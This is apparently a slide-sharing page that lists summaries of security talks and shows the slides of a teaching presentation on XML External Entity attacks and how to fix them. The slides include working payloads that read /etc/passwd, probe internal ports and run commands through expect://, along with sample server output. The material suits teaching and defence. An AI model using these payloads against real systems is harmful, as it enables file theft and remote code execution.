This document summarizes potential vulnerabilities in how different layers of a web application process data. It discusses how each layer - including hardware, operating system, browser, network, web server, framework, application and database - accepts inputs and produces outputs that could be leveraged maliciously if not properly validated. The key point is that inputs may come from sources beyond just user input, and outputs may contain sensitive information, so all data processed across layers needs to be carefully validated. Specific examples are provided of vulnerabilities the author has discovered in how various popular systems handle specific inputs or transformations at each layer.
This document summarizes potential vulnerabilities in how different layers of a web application process data. It discusses how each layer - including hardware, operating system, browser, network, web server, framework, application and database - accepts inputs and produces outputs that could be leveraged maliciously if not properly validated. Many real-world examples are provided of how inputs passed between layers can bypass validation checks if the layers' data processing rules are not well understood by developers. The key message is that all variables not explicitly set in code should be considered untrusted.
DEF CON 24 - workshop - Craig Young - brainwashing embedded systems (Felipe Prado)
Firmware analysis often involves searching firmware images for known file headers and file systems like SquashFS to extract contained files. Automated binary analysis tools like binwalk can help extract files from images. HTTP interfaces are common targets for security testing since they are often exposed without authentication. Testing may uncover vulnerabilities like XSS, CSRF, SQLi or command injection. Wireless interfaces also require testing to check for issues like weak encryption or exposure of credentials in cleartext.
Vorontsov, Golovko - SSRF attacks and sockets: smorgasbord of vulnerabilities (DefconRussia)
This document summarizes vulnerabilities related to server-side request forgery (SSRF) attacks and how they can be exploited. It discusses how external network access and internal network access can be obtained through SSRF. It provides examples of vulnerabilities in various protocols like HTTP, FTP, TFTP, and protocols used by services like Memcached, databases, and file uploads. It also describes how file descriptors can be used to write to open sockets or files to forge server responses or inject malicious content. Overall, the document is an overview of real-world SSRF attacks and exploitation techniques.
This document summarizes XML out-of-band data retrieval attacks using XML external entities. It discusses how XML external entities can be used to retrieve files from remote servers or make requests to external resources. It also covers how entities defined in attributes can be used to bypass restrictions on external entity references. The document demonstrates these attack techniques and outlines tools that can automate XML out-of-band exploitation.
This document provides an overview of implementing the OSSEC HIDS (Host-based Intrusion Detection System). It discusses OSSEC's architecture, features like log analysis, integrity monitoring, rootkit detection, policy auditing and alerts. It also covers installing and configuring OSSEC servers and agents, as well as customizing configuration and rule files. Challenges of deploying OSSEC at large scale are also mentioned.
Scott Sutherland discusses penetration testing thick applications. He explains why these applications create unique risks compared to web applications due to users having full control over the application environment. This allows attacks on trusted components, exposure of data and admin functions, and privilege escalation. Sutherland outlines the goals and process for testing thick applications, including common architectures, accessing the application, and testing the application's GUI, files, registry, network traffic, memory, and configurations to identify vulnerabilities.
Rails security best practices involve defending at multiple layers including the network, operating system, web server, web application, and database. The document outlines numerous vulnerabilities at the web application layer such as information leaks, session hijacking, SQL injection, mass assignment, unscoped finds, cross-site scripting (XSS), cross-site request forgery (CSRF), and denial-of-service attacks. It provides recommendations to address each vulnerability through secure coding practices and configuration in Rails.
Thick Application Penetration Testing - A Crash Course (NetSPI)
This document provides an overview of penetration testing thick applications. It discusses why thick apps present unique risks compared to web apps, common thick app architectures, and how to access and test various components of thick apps including the GUI, files, registry, network traffic, memory, and configurations. A variety of tools are listed that can be used for tasks like decompiling, injecting code, and exploiting excessive privileges. The document concludes with recommendations such as never storing sensitive data in assemblies and being careful when deploying thick apps via terminal services.
ASP.NET websites can be vulnerable to attacks like file inclusion and remote code execution if they do not properly sanitize user-supplied input, as features like Response.WriteFile and Server.Execute could allow an attacker to read arbitrary files or execute code if passed a malicious file path. The ViewState, Request Validation, and Event Validation features also have weaknesses that could allow attacks like cross-site scripting or request forgery if not implemented correctly.
This document provides information about a PowerShell presentation titled "Powering up on PowerShell". It includes the wireless network credentials to access the demo environment, a link to demo files, an agenda for the presentation topics, and a brief biography of the presenter. Some of the topics to be covered in the presentation include moving around the file system and registry, hashing, data storage techniques, custom event logging, WinRM logging, port scanning, and achieving persistence through PowerShell profiles.
The document discusses testing the security of web services. It covers topics like web service basics, why web services should be tested, old and new techniques for attacking web services like client testing, web method enumeration, XML port scanning, and the need for a structured security testing framework for web services.
This document discusses various vulnerabilities in PHP coding practices and provides examples of how each vulnerability can be exploited as well as how to fix them. It covers remote file inclusion, local file inclusion, local file disclosure, SQL injection, remote command execution, remote code execution, cross-site scripting, authentication bypass, and cross-site request forgery vulnerabilities. For each vulnerability, it provides a basic PHP code example to demonstrate the issue, how an attacker could exploit it, and recommendations on how to fix the vulnerable code, such as sanitizing user inputs, using prepared statements, and implementing authentication systems. The goal is to help PHP developers write more secure code and avoid common vulnerabilities.
Ever wanted to find out someone’s IP address online? Of course you have! Tracing “calls” on the Internet is much more complicated than on the plain old telephone network. This exposé includes a history of traditional techniques used to discover the IP address of a target user in: chat rooms, forums and other types of social networking sites. Attention will be centered around a fundamental weakness in the IRC protocol that allows client IP addresses to be determined. Proof-of-concept samples targeting multiple IRC daemons will be released. Prizes will be awarded to the most interesting submissions for an online edition of ‘Spot The Fed.’
Bio: At the time of writing, Derek is currently an independent security contractor (and in the past for @stake and Symantec.) He’s written various tool packages including a Linux stealth patch to evade nmap’s transport layer OS detection as well as porkbind, a nameserver security scanner. In 2007, he won Cenzic’s SANS contest.
Application and Website Security -- Fundamental Edition (Daniel Owens)
The document provides an agenda for a course on application and website security. The agenda covers common input validation flaws like SQL injection and cross-site scripting, access control flaws like session hijacking, encryption flaws, security tools, and concludes with additional resources for further information. The document uses examples to demonstrate various security vulnerabilities and how they can be exploited.
[HES2013] Virtually secure, analysis to remote root 0day on an industry leadi... (Hackito Ergo Sum)
Today most networks present one “gateway” to the whole network – The SSL-VPN. A vector that is often overlooked and considered “secure”, we decided to take apart an industry leading SSL-VPN appliance and analyze it to bits to thoroughly understand how secure it really is. During this talk we will examine the internals of the F5 FirePass SSL-VPN Appliance. We discover that even though many security protections are in place, the internals of the appliance hide interesting vulnerabilities we can exploit. Through processes ranging from reverse engineering to binary planting, we decrypt the file-system and begin examining the environment. As we go down the rabbit hole, our misconceptions about “security appliances” are revealed.
Using a combination of web vulnerabilities, format string vulnerabilities and a bunch of frustration, we manage to overcome the multiple limitations and protections presented by the appliance to gain a remote unauthenticated root shell. Due to the magnitude of this vulnerability and the potential for impact against dozens of fortune 500 companies, we contacted F5 and received one of the best vendor responses we’ve experienced – EVER!
https://www.hackitoergosum.org
DevSec Delight with Compliance as Code - Matt Ray - AgileNZ 2017 (AgileNZ Conference)
For too long, audits and security reviews have been seen as resistant to the frequent release of software. Auditors require access to static systems and environments, which would seem to make continuous delivery impossible. Too frequently audits are a fire drill sampling of the current state and temporary fixes are put in place to appease the compliance audit without being integrated into future releases.
About Matt Ray:
Matt Ray is the Manager and Solutions Architect for Asia Pacific and Japan for Chef. He has worked in large enterprise software companies and founded his own startups in a wide variety of industries including banking, retail and government.
He has been active in open source communities for over two decades and has spoken at, and helped organise, many conferences and Meetups. He currently resides in Sydney, Australia after relocating from Austin, Texas. He podcasts at SoftwareDefinedTalk.com, blogs at LeastResistance.net and is @mattray on Twitter, IRC, GitHub and too many Slacks.
This document summarizes a PowerShell presentation given at Bsides Greenville 2019. It provides wireless network credentials, links to PowerShell cheat sheets and demos, and lists the speaker's background and experience with PowerShell. The presentation agenda covers topics like moving around the file system, hashing, data storage, custom event logs, WinRM logging, port scanning, and persistence through profiles.
This document provides an introduction to dynamic web content and web application technologies. It discusses how web servers, browsers, HTML, CSS, JavaScript, and other technologies work together to deliver dynamic web pages and applications to users. Key points covered include how browsers make HTTP requests to servers, how servers respond with HTML documents, and how languages like JavaScript can be used to add interactivity to web pages. Network concepts like TCP connections, ports, and IP addresses are also briefly summarized.
The document discusses Server Side Request Forgery (SSRF), including what it is, different types (blind and basic), ways to exploit it like bypassing filters and chaining vulnerabilities, tools that can be used for detection, and two case studies of SSRF vulnerabilities found in the wild. The first case involves using an SSRF to retrieve internal data and then storing malicious HTML in a generated PDF. The second case was an unauthenticated blind SSRF in a Jira OAuth authorization controller that was exploited through a malicious Host header.
[CB20] Operation I am Tom: How APT actors move laterally in corporate network... (CODE BLUE)
This document discusses techniques used by threat actors to move laterally within corporate networks. It begins with an introduction and covers post-exploitation techniques including Mimikatz for credential theft, Skeleton Key and Wdigest for password dumping, webshell deployment on IIS and Exchange servers, and other miscellaneous techniques such as abusing VPNs and using rootkits. Precautions are provided for each technique discussed.
This document discusses techniques for hunting bad guys on networks, including identifying client-side attacks, malware command and control channels, post-exploitation activities, and hunting artifacts. It provides examples of using DNS logs, firewall logs, HTTP logs, registry keys, installed software inventories, and the AMCache registry hive to look for anomalous behaviors that could indicate security compromises. The goal is to actively hunt for threats rather than just detecting known bad behaviors.
This document provides information about DHCP and DNS logging. It discusses:
- Microsoft DHCP logs location and format, with limitations like one week retention
- ISC DHCP logs to syslog and examples of log entries
- DNS logging using DNSCAP or network packet captures
- Microsoft and ISC BIND DNS logging configurations and limitations
It recommends searching DHCP logs by IP address or MAC address to identify devices, and DNS logs to see domains visited and querying IPs. The document also notes attackers may change IP addresses, and malware may strip version information to evade detection.
[若渴計畫] Challenges and Solutions of Window Remote Shellcode (Aj MaChInE)
This document discusses challenges and solutions related to window remote shellcode. It outlines challenges posed by antivirus software, EMET, firewalls, and IDS/IPS systems. It then describes various techniques for bypassing these protections, such as encryption, obfuscation, non-standard programming languages, and the use of tools like Meterpreter and Veil Framework payloads. Specific bypass techniques covered include DLL injection, process hollowing, reflective loading, and the use of techniques like one-way shells and HTTP stagers.
OWASP Portland - OWASP Top 10 For JavaScript Developers (Lewis Ardern)
With the release of the OWASP TOP 10 2017 we saw new issues rise as contenders of most common issues in the web landscape. Much of the OWASP documentation displays issues, and remediation advice/code relating to Java, C++, and C#; however not much relating to JavaScript. JavaScript has drastically changed over the last few years with the release of Angular, React, and Vue, alongside the popular use of NodeJS and its libraries/frameworks. This talk will introduce you to the OWASP Top 10 explaining JavaScript client and server-side vulnerabilities.
A Hacker's Perspective on Embedded Device Security, presented by Paul Dant of Independent Security Evaluators at the Security of Things Forum, Sept. 10, 2015
The importance of sustainable and efficient computational practices in artificial intelligence (AI) and deep learning has become increasingly critical. This webinar focuses on the intersection of sustainability and AI, highlighting the significance of energy-efficient deep learning, innovative randomization techniques in neural networks, the potential of reservoir computing, and the cutting-edge realm of neuromorphic computing. This webinar aims to connect theoretical knowledge with practical applications and provide insights into how these innovative approaches can lead to more robust, efficient, and environmentally conscious AI systems.
Webinar Speaker: Prof. Claudio Gallicchio, Assistant Professor, University of Pisa
Claudio Gallicchio is an Assistant Professor at the Department of Computer Science of the University of Pisa, Italy. His research involves merging concepts from Deep Learning, Dynamical Systems, and Randomized Neural Systems, and he has co-authored over 100 scientific publications on the subject. He is the founder of the IEEE CIS Task Force on Reservoir Computing, and the co-founder and chair of the IEEE Task Force on Randomization-based Neural Networks and Learning Systems. He is an associate editor of IEEE Transactions on Neural Networks and Learning Systems (TNNLS).
This presentation by OECD, OECD Secretariat, was made during the discussion “The Intersection between Competition and Data Privacy” held at the 143rd meeting of the OECD Competition Committee on 13 June 2024. More papers and presentations on the topic can be found at oe.cd/ibcdp.
This presentation was uploaded with the author’s consent.
Carrer goals.pptx and their importance in real lifeartemacademy2
Career goals serve as a roadmap for individuals, guiding them toward achieving long-term professional aspirations and personal fulfillment. Establishing clear career goals enables professionals to focus their efforts on developing specific skills, gaining relevant experience, and making strategic decisions that align with their desired career trajectory. By setting both short-term and long-term objectives, individuals can systematically track their progress, make necessary adjustments, and stay motivated. Short-term goals often include acquiring new qualifications, mastering particular competencies, or securing a specific role, while long-term goals might encompass reaching executive positions, becoming industry experts, or launching entrepreneurial ventures.
Moreover, having well-defined career goals fosters a sense of purpose and direction, enhancing job satisfaction and overall productivity. It encourages continuous learning and adaptation, as professionals remain attuned to industry trends and evolving job market demands. Career goals also facilitate better time management and resource allocation, as individuals prioritize tasks and opportunities that advance their professional growth. In addition, articulating career goals can aid in networking and mentorship, as it allows individuals to communicate their aspirations clearly to potential mentors, colleagues, and employers, thereby opening doors to valuable guidance and support. Ultimately, career goals are integral to personal and professional development, driving individuals toward sustained success and fulfillment in their chosen fields.
This presentation by Thibault Schrepel, Associate Professor of Law at Vrije Universiteit Amsterdam University, was made during the discussion “Artificial Intelligence, Data and Competition” held at the 143rd meeting of the OECD Competition Committee on 12 June 2024. More papers and presentations on the topic can be found at oe.cd/aicomp.
This presentation was uploaded with the author’s consent.
This presentation by Yong Lim, Professor of Economic Law at Seoul National University School of Law, was made during the discussion “Artificial Intelligence, Data and Competition” held at the 143rd meeting of the OECD Competition Committee on 12 June 2024. More papers and presentations on the topic can be found at oe.cd/aicomp.
This presentation was uploaded with the author’s consent.
This presentation by Professor Alex Robson, Deputy Chair of Australia’s Productivity Commission, was made during the discussion “Competition and Regulation in Professions and Occupations” held at the 77th meeting of the OECD Working Party No. 2 on Competition and Regulation on 10 June 2024. More papers and presentations on the topic can be found at oe.cd/crps.
This presentation was uploaded with the author’s consent.
XP 2024 presentation: A New Look to Leadershipsamililja
Presentation slides from XP2024 conference, Bolzano IT. The slides describe a new view to leadership and combines it with anthro-complexity (aka cynefin).
Suzanne Lagerweij - Influence Without Power - Why Empathy is Your Best Friend...Suzanne Lagerweij
This is a workshop about communication and collaboration. We will experience how we can analyze the reasons for resistance to change (exercise 1) and practice how to improve our conversation style and be more in control and effective in the way we communicate (exercise 2).
This session will use Dave Gray’s Empathy Mapping, Argyris’ Ladder of Inference and The Four Rs from Agile Conversations (Squirrel and Fredrick).
Abstract:
Let’s talk about powerful conversations! We all know how to lead a constructive conversation, right? Then why is it so difficult to have those conversations with people at work, especially those in powerful positions that show resistance to change?
Learning to control and direct conversations takes understanding and practice.
We can combine our innate empathy with our analytical skills to gain a deeper understanding of complex situations at work. Join this session to learn how to prepare for difficult conversations and how to improve our agile conversations in order to be more influential without power. We will use Dave Gray’s Empathy Mapping, Argyris’ Ladder of Inference and The Four Rs from Agile Conversations (Squirrel and Fredrick).
In the session you will experience how preparing and reflecting on your conversation can help you be more influential at work. You will learn how to communicate more effectively with the people needed to achieve positive change. You will leave with a self-revised version of a difficult conversation and a practical model to use when you get back to work.
Come learn more on how to become a real influencer!
This presentation by Nathaniel Lane, Associate Professor in Economics at Oxford University, was made during the discussion “Pro-competitive Industrial Policy” held at the 143rd meeting of the OECD Competition Committee on 12 June 2024. More papers and presentations on the topic can be found at oe.cd/pcip.
This presentation was uploaded with the author’s consent.
This presentation by OECD, OECD Secretariat, was made during the discussion “Artificial Intelligence, Data and Competition” held at the 143rd meeting of the OECD Competition Committee on 12 June 2024. More papers and presentations on the topic can be found at oe.cd/aicomp.
This presentation was uploaded with the author’s consent.
This presentation by Professor Giuseppe Colangelo, Jean Monnet Professor of European Innovation Policy, was made during the discussion “The Intersection between Competition and Data Privacy” held at the 143rd meeting of the OECD Competition Committee on 13 June 2024. More papers and presentations on the topic can be found at oe.cd/ibcdp.
This presentation was uploaded with the author’s consent.
This presentation by Juraj Čorba, Chair of OECD Working Party on Artificial Intelligence Governance (AIGO), was made during the discussion “Artificial Intelligence, Data and Competition” held at the 143rd meeting of the OECD Competition Committee on 12 June 2024. More papers and presentations on the topic can be found at oe.cd/aicomp.
This presentation was uploaded with the author’s consent.
This presentation by OECD, OECD Secretariat, was made during the discussion “Competition and Regulation in Professions and Occupations” held at the 77th meeting of the OECD Working Party No. 2 on Competition and Regulation on 10 June 2024. More papers and presentations on the topic can be found at oe.cd/crps.
This presentation was uploaded with the author’s consent.
Competition and Regulation in Professions and Occupations – OECD – June 2024 ...
XML External Entity Null Meet 19_3_16.pptx
1. XML eXternal Entity Attack (XXE) and other related attacks
By:
Samit Anwer
samit.anwer@gmail.com
2. Agenda
• Document Type Definition
• Prerequisites to perform an XXE attack
• Outcomes
• Fixing XXE vulnerabilities
3. Document Type Definition (DTD)
A DTD defines the structure of an XML document: its legal elements, entities and attributes
[Diagram: Internal DTD vs. External DTD]
4. Why External Entities?
• Common references shared between multiple XML documents
<?xml version="1.0" standalone="no" ?>
<!DOCTYPE copyright [ <!ELEMENT copyright (#PCDATA)> <!ENTITY c SYSTEM "http://www.xmlwriter.net/copyright.xml"> ]>
<copyright>&c;</copyright>
• Security issues arise because PHP places no restrictions on what URLs can be accessed, even if allow_url_fopen is set to false in php.ini
5. Prerequisites to perform an XXE attack
• The application parses XML documents
• Tainted data is allowed within the system identifier of the entity, within the DTD
• The XML processor is configured to validate and process the DTD
• The XML processor is configured to resolve external entities within the DTD
6. Outcomes
• Disclosure of confidential data / file inclusion
• Server Side Request Forgery (SSRF)
• Port Scanning
• DoS on the parsing system
• Remote Code Execution
7. File inclusion
• The local file must be valid XML
• What if it is not?
• It is possible to encode binary files as a Base64 encoded string
• What if the confidential file is not reflected in the response?
<!DOCTYPE scan [<!ENTITY test SYSTEM "file:///etc/passwd">]>
<scan>&test;</scan>
<!DOCTYPE scan [<!ENTITY test SYSTEM "php://filter/read=convert.base64-encode/resource=/etc/passwd">]>
<scan>&test;</scan>
DEMO
8. SSRF
• An attacker has the ability to create requests from the vulnerable server
DEMO
9. Port Scanning
• It is possible to specify ports to which the XML parser will connect
• As long as PHP error messages are enabled, you get back the banner of the service running even if the port doesn't support the HTTP protocol
• What if error messages are disabled? Time is your friend!
<!DOCTYPE scan [<!ENTITY test SYSTEM "http://localhost:22">]>
<scan>&test;</scan>
Warning: simplexml_load_string(http://localhost:22): failed to open stream: HTTP request failed!
SSH-2.0-OpenSSH_5.5p1 Debian-4ubuntu5 in testxml.php on line 10
10. DoS
• Billion laughs attack (https://en.wikipedia.org/wiki/Billion_laughs)
• Try opening file:///dev/random
11. Remote Code Execution
Request:
<!DOCTYPE root [<!ENTITY foo SYSTEM "expect://id">]>
<methodCall>
<methodName>&foo;</methodName>
</methodCall>
Response:
<?xml version="1.0" encoding="UTF-8"?>
<methodResponse>
<fault><value><struct><member><name>faultCode</name><value><int>620</int></value></member><member><name>faultString</name><value>
<string>Method "uid=33(www-data) gid=33(www-data) groups=33(www-data)
" does not exist</string>
</value></member></struct></value></fault></methodResponse>
12. Fixes – JAVA
• Disable DTDs
• If it is not possible to disable DTDs completely, then:
  • Disable external entities
  • Disable external DTDs
factory.setFeature("http://apache.org/xml/features/disallow-doctype-decl", true);
factory.setFeature("http://xml.org/sax/features/external-general-entities", false);
factory.setFeature("http://apache.org/xml/features/nonvalidating/load-external-dtd", false);
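The same two defences expressed with Python's standard-library SAX parser, as an added example that is not the slides' own code: the stdlib exposes the identical SAX feature URI the Java fix sets to false as feature_external_ges (plus its parameter-entity twin), and a DOCTYPE pre-check stands in for disallow-doctype-decl. The sample document, DOCTYPE_RE and both helper functions are constructed for this example.

```python
import io
import re
import xml.sax
from xml.sax.handler import ContentHandler, feature_external_ges, feature_external_pes

# Constructed sample (not the slides' demo input) with the shape of the
# file-inclusion payload: an external general entity with a file:// system id.
XXE_SAMPLE = (
    b'<?xml version="1.0"?>\n'
    b'<!DOCTYPE scan [<!ENTITY test SYSTEM "file:///etc/passwd">]>\n'
    b'<scan>&test;</scan>'
)

DOCTYPE_RE = re.compile(rb"<!DOCTYPE", re.IGNORECASE)


def reject_doctype(xml_bytes: bytes) -> bytes:
    """Strict option, the counterpart of Java's disallow-doctype-decl:
    refuse any document that carries a DTD, so no entity can be declared."""
    if DOCTYPE_RE.search(xml_bytes):
        raise ValueError("DOCTYPE declarations are not accepted")
    return xml_bytes


class _TextCollector(ContentHandler):
    """Gathers character data so the caller can see what the parser emitted."""

    def __init__(self):
        super().__init__()
        self.parts = []

    def characters(self, content):
        self.parts.append(content)


def parse_hardened(xml_bytes: bytes) -> str:
    """Fallback when DTDs must stay enabled: parse with external general and
    parameter entities switched off, so a SYSTEM identifier is never
    dereferenced. Returns the text content the parser produced."""
    parser = xml.sax.make_parser()
    # feature_external_ges is "http://xml.org/sax/features/external-general-entities",
    # the feature the Java fix sets to false; feature_external_pes covers
    # "http://xml.org/sax/features/external-parameter-entities".
    parser.setFeature(feature_external_ges, False)
    parser.setFeature(feature_external_pes, False)
    collector = _TextCollector()
    parser.setContentHandler(collector)
    parser.parse(io.BytesIO(xml_bytes))
    return "".join(collector.parts)
```

With the features off, the external entity in XXE_SAMPLE is skipped rather than dereferenced, so the parsed text is empty instead of the file's contents.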
An XML External Entity attack is a type of attack against an application that parses XML input.
This attack occurs when XML input containing a reference to an external entity is processed by a weakly configured XML parser.
The system identifier is assumed to be a URI that can be dereferenced by the XML processor when processing the entity.
The XML processor then replaces occurrences of the named external entity with the contents dereferenced by the system identifier.
If the system identifier contains tainted data and the XML processor dereferences this tainted data, the XML processor may disclose confidential information.
The expect:// wrapper used on the Remote Code Execution slide comes from the PHP expect extension, which allows PHP to interact with processes through a PTY.